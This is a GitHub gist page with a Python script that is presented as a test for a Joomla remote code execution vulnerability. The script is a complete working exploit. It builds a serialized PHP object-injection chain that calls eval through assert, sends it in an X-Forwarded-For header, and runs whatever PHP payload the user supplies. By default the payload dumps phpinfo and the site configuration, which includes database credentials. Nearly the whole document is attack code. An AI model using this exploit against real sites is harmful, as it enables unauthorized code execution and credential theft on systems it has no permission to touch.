Skip to content

Instantly share code, notes, and snippets.

@stevenrombauts
Last active January 6, 2016 10:28
Show Gist options
  • Save stevenrombauts/553584e7ab2ef4a832f2 to your computer and use it in GitHub Desktop.
Save stevenrombauts/553584e7ab2ef4a832f2 to your computer and use it in GitHub Desktop.
Joomla test for 20151201 Remote Code Execution Vulnerability
#!/usr/bin/env python
##
# This scripts tests a given website for the 20151201 Remote Code Execution Vulnerability ( https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html)
#
# Instructions:
# - Download this gist: wget https://gist.githubusercontent.com/stevenrombauts/553584e7ab2ef4a832f2/raw/a140c7f5c1bcdc44e71dbfb07da76e418379ba8e/exploit-joomla.py
# - Make executable: chmod +x exploit-joomla.py
# - Run: ./exploit-joomla.py http://yoursite.com/
##
import requests
import sys
import uuid
import md5
def main(argv):
try:
target = argv[1]
except IndexError:
usage()
try:
payload = argv[2]
except IndexError:
payload = "phpinfo(); print_r(JFactory::getConfig());"
print "Testing {0} with payload \"{1}\" ..".format(target, payload)
identifier = uuid.uuid4()
payload += "echo '{0}';".format(identifier)
pl = generate_payload(payload)
response = exploit(target, pl)
text_file = open("/tmp/result.html", "w")
text_file.write(response.text.encode('utf-8'))
text_file.close()
print "Response stored in /tmp/result.html"
if str(identifier) in response.text:
print "{0} is \033[91mvulnerable\033[0m: PHP payload was injected and executed!".format(target)
else:
print "{0} is \033[92msafe\033[0m from code injection.".format(target)
def usage():
print "Usage: ./script <URL to scan> [PHP payload]"
sys.exit(0)
def exploit(url, user_agent):
headers = {
'X-Forwarded-For': user_agent
}
cookies = requests.get(url,headers=headers).cookies
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_to_chr(data):
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_code = "eval({0})".format(php_to_chr(php_payload))
injected_payload = "{};JFactory::getConfig();exit".format(php_code)
exploit = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
exploit += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'''
exploit += '\xf0\xfd\xfd\xfd'
return exploit
if __name__ == '__main__':
main(sys.argv)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment